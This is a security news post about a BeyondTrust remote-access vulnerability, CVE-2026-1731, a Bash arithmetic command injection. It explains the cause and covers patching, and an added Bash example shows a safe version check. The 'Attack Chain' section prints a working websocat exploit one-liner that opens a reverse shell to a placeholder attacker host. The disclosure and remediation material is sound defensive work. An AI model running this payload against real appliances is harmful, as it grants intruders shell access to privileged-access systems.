Security News

Cybersecurity news aggregator


BeyondTrust Gets Hit Again: Pre-Auth RCE in Remote Support Tools


February 13, 2026
#security #cve #beyondtrust #remote-access #command-injection #CVE-2026-1731

BeyondTrust Remote Support and Privileged Remote Access have a critical pre-authentication RCE bug. No login needed, no user interaction, just send a crafted WebSocket request and you’re executing OS commands as the site user.

This is CVE-2026-1731. CVSS 9.9. And it’s in the exact same endpoint that got exploited by Chinese state actors three months ago.

What Happened

The vulnerability is a command injection in the `thin-scc-wrapper` script. This script handles WebSocket connections at `/nw` and reads a version number from the client. The problem? That version number gets used in a Bash arithmetic comparison without proper validation.

When Bash evaluates something like `[[ "$localVersion" -lt "$remoteVersion" ]]`, it treats the operands as arithmetic expressions. An attacker can send a malicious version number like `a[$(command)]` and Bash will execute whatever’s in that subshell.

Attack Chain

The exploit is straightforward. Connect to the WebSocket endpoint at `/nw` with the protocol header `ingredi support desk customer thin`. Send four newline-delimited values: a malicious version number, a UUID for the cookie, an auth type, and a gskey.

The version number is where the injection happens. Format it as `a[$(your_command)]` and that command runs when the script hits the arithmetic comparison.

Example uses a Bash reverse shell:

    echo -ne "hax[\$(/bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | websocat -k wss://target:443/nw --protocol "ingredi support desk customer thin" -H "X-Ns-Company: company_name" --binary -n -

Commands execute in the context of the site user. Full system access follows.

Who Should Care

Anyone running BeyondTrust Remote Support or Privileged Remote Access on-premises. SaaS customers got auto-patched on February 2nd.

There are roughly 8,500 internet-facing on-prem instances that could be vulnerable. BeyondTrust has 20,000+ customers including 75% of the Fortune 100. These tools are deployed in environments that handle privileged access to critical systems.

The attack requires no authentication, no user interaction, and there’s a public PoC. If you’re running an affected version and haven’t patched, you’re exposed.

Why This Happened

This is a Bash arithmetic evaluation bug. The code uses comparison operators like `-lt` inside `[[ ]]` without validating that the operands are actually numbers. Bash treats those operands as expressions and evaluates them.

It’s a subtle gotcha. Most developers know to sanitize shell input, but arithmetic evaluation is less obvious. You see what looks like a safe numeric comparison and miss that Bash will execute code embedded in the “number.”

What makes this worse? It’s in the same endpoint as CVE-2024-12356, which Chinese state actors exploited to breach the US Treasury in December. BeyondTrust fixed that bug, but missed this variant sitting right next to it.

The researchers who found this used AI-enabled variant analysis. They discovered it one day after watchTowr published analysis of a similar Bash arithmetic bug in Ivanti EPMM. Pattern recognition at work.

What to Do

Update immediately.

For self-hosted Remote Support:

1. Log into the appliance interface
2. Navigate to `/appliance`
3. Apply patch BT26-02-RS

For self-hosted Privileged Remote Access:

1. Log into the appliance interface
2. Navigate to `/appliance`
3. Apply patch BT26-02-PRA

Or upgrade to version 25.1.1 or later

If you’re on Remote Support older than 21.3 or PRA older than 22.1, you need to upgrade to a newer base version first before you can apply the patch.

SaaS customers don’t need to do anything. You were patched on February 2nd.

While you’re patching, review your network segmentation. These tools shouldn’t be directly exposed to the internet. Put them behind a VPN or access control that requires authentication before you even reach the vulnerable endpoint. That doesn’t fix the bug, but it reduces your attack surface until you can patch.

Quick Reference

| Item | Details |
| --- | --- |
| CVE ID | CVE-2026-1731 |
| CVSS Score | 9.9 (v4), 9.8 (v3) |
| Authentication Required | None |
| User Interaction Required | None |
| Attack Complexity | Low |
| Products Affected | Remote Support 25.3.1 and earlier, PRA 24.3.4 and earlier |
| Fixed Versions | RS: Patch BT26-02-RS, PRA 25.1.1+ |
| Public PoC | Yes |
| Active Exploitation | Not reported as of Feb 12, 2026 |
| Patch Availability | Yes (BT26-02-RS, BT26-02-PRA) |

FAQ

Q: Is this being exploited in the wild?
A: Not as of February 12, 2026. BeyondTrust and security researchers report no active exploitation. But there’s a public PoC and it’s easy to exploit, so assume that window is closing fast.

Q: How is this different from CVE-2024-12356?
A: Different vulnerability, same endpoint. CVE-2024-12356 was exploited as a zero-day by Chinese state actors. CVE-2026-1731 was found through responsible disclosure and patched before exploitation. But b...
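The arithmetic-evaluation pitfall described under "Why This Happened", shown beside a hardened comparison. This is an added example, not code from the original article or from BeyondTrust's script; the function names, the digit-only validation rule and the marker-file probe are assumptions made for illustration.

```bash
#!/usr/bin/env bash
# Added illustration: an untrusted "version" string reaching a Bash arithmetic context.
# All names and the sample hostile value below are constructed for this example.

# Unsafe pattern: -lt inside [[ ]] evaluates both operands as arithmetic
# expressions, so a $(...) inside an array subscript is expanded and run.
is_older_unsafe() {
  local localVersion=$1 remoteVersion=$2
  [[ "$localVersion" -lt "$remoteVersion" ]]
}

# Hardened pattern: accept only 1-9 decimal digits before any arithmetic
# context sees the value. Returns 2 on invalid input, 0 if older, 1 otherwise.
# The 10# prefix forces base 10 so "08" is not rejected as invalid octal.
is_older_safe() {
  local localVersion=$1 remoteVersion=$2
  [[ $localVersion =~ ^[0-9]{1,9}$ && $remoteVersion =~ ^[0-9]{1,9}$ ]] || return 2
  (( 10#$localVersion < 10#$remoteVersion ))
}

# Feed one checker a constructed hostile value whose embedded command only
# creates a marker file in a private temp directory, then report whether
# that command ran ("executed") or never reached evaluation ("blocked").
probe() {
  local checker=$1 dir marker hostile result
  dir=$(mktemp -d) || return 1
  marker="$dir/executed"
  hostile="a[\$(touch $marker)]"
  # Subshell isolates any evaluation error raised by the checker.
  ( "$checker" 5 "$hostile" ) >/dev/null 2>&1 || true
  if [[ -e $marker ]]; then result=executed; else result=blocked; fi
  rm -rf "$dir"
  printf '%s\n' "$result"
}
```

`probe is_older_unsafe` reports that the embedded command ran, while `probe is_older_safe` reports it blocked; the same digits-only gate belongs in front of `(( ))`, `$(( ))`, `let` and the other numeric `[[ ]]` operators.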
